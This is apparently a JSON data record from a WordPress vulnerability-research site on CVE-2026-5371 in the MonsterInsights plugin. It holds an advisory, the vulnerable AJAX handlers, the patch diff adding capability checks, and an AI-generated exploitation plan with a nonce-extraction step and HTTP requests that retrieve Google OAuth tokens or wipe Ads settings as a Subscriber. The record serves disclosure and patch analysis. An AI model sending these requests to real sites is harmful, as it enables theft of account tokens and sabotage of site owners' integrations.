[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUEOLiGhy9x1bEjRogHaLdodm9ZFSyoFJQTLJrh9RAtA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-5371","monsterinsights-missing-authorization-to-authenticated-subscriber-sensitive-information-exposure-and-plugin-integration-","MonsterInsights \u003C= 10.1.2 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure And Plugin Integration Reset","The MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on the get_ads_access_token() and reset_experience() functions in all versions up to, and including, 10.1.2. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve live Google OAuth access tokens and reset the plugin's Google Ads integration.","google-analytics-for-wordpress",null,"\u003C=10.1.2","10.1.3","high",7.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:L\u002FA:N","Missing Authorization","2026-05-12 09:45:13","2026-05-12 22:24:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5d380b66-675e-451d-a7e3-4efe1fbd08b2?source=api-prod",1,[22,23,24,25,26,27,28],"googleanalytics.php","includes\u002Fadmin\u002Fadmin-assets.php","includes\u002Fadmin\u002Fclass-monsterinsights-onboarding.php","includes\u002Fconnect.php","includes\u002Ffrontend\u002Ffrontend.php","includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php","languages\u002Fgoogle-analytics-for-wordpress.pot","researched",false,3,"# Vulnerability Analysis: MonsterInsights Missing Authorization (CVE-2026-5371)\n\n## 1. Vulnerability Summary\nThe MonsterInsights plugin (versions \u003C= 10.1.2) contains a missing authorization vulnerability in its Google Ads integration handlers. The functions `get_ads_access_token()` and `reset_experience()` within the `MonsterInsights_Google_Ads` class are registered as AJAX actions (`wp_ajax_monsterinsights_ads_get_token` and `wp_ajax_monsterinsights_ads_reset_experience`). While these functions verify a WordPress nonce, they fail to perform any capability checks (e.g., `current_user_can()`). Consequently, any authenticated user, including those with **Subscriber** privileges, can retrieve sensitive Google OAuth access tokens or reset the plugin's Google Ads configuration.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoints:** \n    *   `admin-ajax.php?action=monsterinsights_ads_get_token`\n    *   `admin-ajax.php?action=monsterinsights_ads_reset_experience`\n*   **Authentication:** Authenticated (Subscriber+) required.\n*   **Authorization:** None (Missing `current_user_can`).\n*   **CSRF Protection:** Nonce required (Action: `mi-admin-nonce`, Parameter: `nonce`).\n*   **Preconditions:** The site must be connected to Google Analytics via MonsterInsights for a token to exist. For the reset exploit, the Google Ads integration settings must be populated.\n\n## 3. Code Flow\n1.  **Action Registration:** In `includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php`, the `__construct` method registers the AJAX hooks:\n    ```php\n    add_action('wp_ajax_monsterinsights_ads_get_token', array($this, 'get_ads_access_token'));\n    add_action('wp_ajax_monsterinsights_ads_reset_experience', array($this, 'reset_experience'));\n    ```\n2.  **Nonce Verification:** Both handlers call `check_ajax_referer('mi-admin-nonce', 'nonce')`.\n3.  **Vulnerable Sink (Token Exposure):** `get_ads_access_token()` calls `$this->get_access_token()`, which retrieves the token from a transient (`monsterinsights_google_ads_access_token_data`) or the API, then returns it via `wp_send_json_success`.\n4.  **Vulnerable Sink (Setting Reset):** `reset_experience()` calls `self::clear_data()`, which executes `delete_transient(self::TOKEN_CACHE_KEY)` and `monsterinsights_delete_option(self::SETTINGS_KEY)`, effectively wiping the integration.\n\n## 4. Nonce Acquisition Strategy\nThe `mi-admin-nonce` is localized for the `monsterinsights-admin-setup-wizard` script, which is enqueued on various admin pages, including the WordPress Dashboard (`index.php`), accessible to Subscribers.\n\n1.  **Target User:** Any authenticated user (Subscriber).\n2.  **Target Page:** `\u002Fwp-admin\u002Findex.php`.\n3.  
**Source File:** `includes\u002Fadmin\u002Fadmin-assets.php`\n    ```php\n    wp_localize_script(\n        'monsterinsights-admin-setup-wizard',\n        'monsterinsights',\n        array(\n            'ajax'  => admin_url( 'admin-ajax.php' ),\n            'nonce' => wp_create_nonce( 'mi-admin-nonce' ),\n        )\n    );\n    ```\n4.  **Extraction Command:**\n    Use `browser_navigate` to go to `\u002Fwp-admin\u002Findex.php`, then:\n    `browser_eval(\"window.monsterinsights?.nonce\")`\n\n## 5. Exploitation Strategy\n\n### Step 1: Token Exposure\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=monsterinsights_ads_get_token&nonce=[EXTRACTED_NONCE]\n```\n**Expected Response:**\n```json\n{\n    \"success\": true,\n    \"data\": {\n        \"access_token\": \"ya29.a0AfH6S...\"\n    }\n}\n```\n\n### Step 2: Integration Reset\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=monsterinsights_ads_reset_experience&nonce=[EXTRACTED_NONCE]\n```\n**Expected Response:**\n```json\n{\n    \"success\": true,\n    \"data\": {\n        \"message\": \"Google Ads experience reset successfully.\"\n    }\n}\n```\n\n## 6. Test Data Setup\n1.  Install and activate MonsterInsights Lite 10.1.2.\n2.  
**Mock Authentication:** Since actual Google OAuth is difficult in a PoC, manually set the options\u002Ftransients that the vulnerable functions expect:\n    ```bash\n    # Set fake settings\n    wp option update monsterinsights_google_ads_settings '{\"conversion_tracking_id\": \"AW-123456789\"}' --format=json\n    # Set fake token in transient\n    wp transient set monsterinsights_google_ads_access_token_data '{\"token\":\"poc-fake-access-token\",\"expires_at\":\"2099-01-01 00:00:00\"}' 3600\n    # Ensure MI is \"authed\" (required for get_access_token)\n    wp option update monsterinsights_site_auth '{\"analytics\":{\"key\":\"fake_key\"}}' --format=json\n    ```\n3.  Create a Subscriber user:\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n\n## 7. Expected Results\n*   **Token Exposure:** The AJAX response should contain the value `\"poc-fake-access-token\"`.\n*   **Reset:** The AJAX response should return success, and the `monsterinsights_google_ads_settings` option should no longer exist in the database.\n\n## 8. Verification Steps\n1.  **Verify Reset via CLI:**\n    ```bash\n    wp option get monsterinsights_google_ads_settings\n    # Expected: Error: Could not find the option with key 'monsterinsights_google_ads_settings'.\n    ```\n2.  **Verify Transient Removal:**\n    ```bash\n    wp transient get monsterinsights_google_ads_access_token_data\n    # Expected: (empty\u002Ffalse)\n    ```\n\n## 9. Alternative Approaches\nIf `window.monsterinsights.nonce` is not present on `index.php`, navigate to any page containing a MonsterInsights notice or the onboarding wizard. 
\nCheck `admin-assets.php` for other scripts that might expose the nonce:\n*   `monsterinsights-admin-common-script` localizes `monsterinsights_admin_common.dismiss_notice_nonce` (different action: `monsterinsights-dismiss-notice`).\n*   The `mi-admin-nonce` is the specific one used by the vulnerable handlers in `class-monsterinsights-google-ads.php`. If it's missing from the main dashboard, use `wp post create` to create a page containing a MonsterInsights-specific shortcode if any are available in Lite to force script enqueuing.","The MonsterInsights plugin fails to validate user capabilities in its Google Ads integration handlers. This allows authenticated users with Subscriber-level access to leak sensitive Google OAuth access tokens or reset the plugin's Google Ads integration settings via unauthorized AJAX requests.","\u002F\u002F includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php:50\nadd_action('wp_ajax_monsterinsights_ads_get_token', array($this, 'get_ads_access_token'));\nadd_action('wp_ajax_monsterinsights_ads_reset_experience', array($this, 'reset_experience'));\n\n---\n\n\u002F\u002F includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php:166\npublic function reset_experience() {\n    check_ajax_referer('mi-admin-nonce', 'nonce');\n\n    self::clear_data();\n\n    wp_send_json_success(array(\n        'message' => __('Google Ads experience reset successfully.', 'google-analytics-for-wordpress'),\n    ));\n}\n\n---\n\n\u002F\u002F includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php:240\npublic function get_ads_access_token()\n{\n    check_ajax_referer('mi-admin-nonce', 'nonce');\n\n    $access_token_result = $this->get_access_token();\n\n    if (is_wp_error($access_token_result)) {\n        wp_send_json_error(array(\n            'message' => $access_token_result->get_error_message(),\n            'code'    => $access_token_result->get_error_code(),\n            'details' => 
$access_token_result->get_error_data(),\n        ));\n    }\n\n    wp_send_json_success(array(\n        'access_token' => $access_token_result,\n    ));\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.2\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.3\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.2\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php\t2026-02-05 14:33:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.3\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php\t2026-04-22 16:46:26.000000000 +0000\n@@ -167,6 +167,12 @@\n \tpublic function reset_experience() {\n \t\tcheck_ajax_referer('mi-admin-nonce', 'nonce');\n \n+\t\tif (! current_user_can('monsterinsights_save_settings')) {\n+\t\t\twp_send_json_error(array(\n+\t\t\t\t'message' => __('You do not have permission to reset the Google Ads experience.', 'google-analytics-for-wordpress'),\n+\t\t\t));\n+\t\t}\n+\n \t\tself::clear_data();\n \n \t\twp_send_json_success(array(\n@@ -244,6 +250,12 @@\n \t{\n \t\tcheck_ajax_referer('mi-admin-nonce', 'nonce');\n \n+\t\tif (! 
current_user_can('monsterinsights_save_settings')) {\n+\t\t\twp_send_json_error(array(\n+\t\t\t\t'message' => __('You do not have permission to retrieve the Google Ads access token.', 'google-analytics-for-wordpress'),\n+\t\t\t));\n+\t\t}\n+\n \t\t$access_token_result = $this->get_access_token();\n \n \t\tif (is_wp_error($access_token_result)) {","An attacker with Subscriber-level authentication can exploit this vulnerability through the following steps:\n1. Log in to the WordPress site as any authenticated user (e.g., Subscriber).\n2. Obtain the 'mi-admin-nonce' value, which is localized and enqueued for various admin scripts (like the setup wizard or admin bar) and often visible in the source of the WordPress dashboard (`\u002Fwp-admin\u002Findex.php`).\n3. Send an authenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the parameter `action=monsterinsights_ads_get_token` and the captured `nonce` to retrieve the current Google OAuth access token.\n4. Alternatively, send a POST request with `action=monsterinsights_ads_reset_experience` and the `nonce` to wipe the plugin's Google Ads integration settings from the database.","gemini-3-flash-preview","2026-05-14 18:11:48","2026-05-14 18:12:26",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","10.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-for-wordpress\u002Ftags\u002F10.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-for-wordpress.10.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-for-wordpress\u002Ftags\u002F10.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-for-wordpress.10.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-for-wordpress\u002Ftags"]